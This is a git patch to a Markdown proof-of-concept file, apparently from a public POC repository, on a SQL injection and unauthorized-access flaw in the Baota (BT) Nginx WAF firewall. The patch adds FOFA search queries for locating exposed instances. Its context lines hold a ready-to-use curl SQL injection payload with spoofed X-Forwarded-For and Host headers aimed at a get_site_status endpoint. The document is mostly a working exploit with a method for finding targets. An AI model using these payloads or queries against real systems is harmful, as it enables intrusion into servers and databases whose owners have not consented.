From e310ff5e4255b3717111754a358aa0443a572dc8 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 2 Apr 2024 14:21:26 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E5=AE=9D=E5=A1=94=E6=9C=80=E6=96=B0?=
 =?UTF-8?q?=E6=9C=AA=E6=8E=88=E6=9D=83=E8=AE=BF=E9=97=AE=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?=E5=8F=8Asql=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 宝塔最新未授权访问漏洞及sql注入.md | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/宝塔最新未授权访问漏洞及sql注入.md b/宝塔最新未授权访问漏洞及sql注入.md
index 754dcd3..c6e9aef 100644
--- a/宝塔最新未授权访问漏洞及sql注入.md
+++ b/宝塔最新未授权访问漏洞及sql注入.md
@@ -2,6 +2,13 @@
 
 WAF 防火墙 (宝塔 Nginx 防火墙) 存在 SQL 注入漏洞和未授权漏洞
 
+## fofa
+```
+title=='404 - Website not exist!'
+
+"宝塔"
+```
+
 ## 未授权
 
 漏洞代码
@@ -53,9 +60,12 @@ curl 'http://btwaf-demo.bt.cn/get_site_status?server_name=bt.cn'  -H 'X-Forwarde
 
 ```
 ## sql注入
+
 ```
 curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'
 ```
+![image](https://github.com/wy876/POC/assets/139549762/bbd89fb6-b9b7-4628-a33d-57fc7b8708e5)
+
 
 ## 漏洞来源
 - https://mp.weixin.qq.com/s/7AqKcCS9puZgb9lG2KcAsg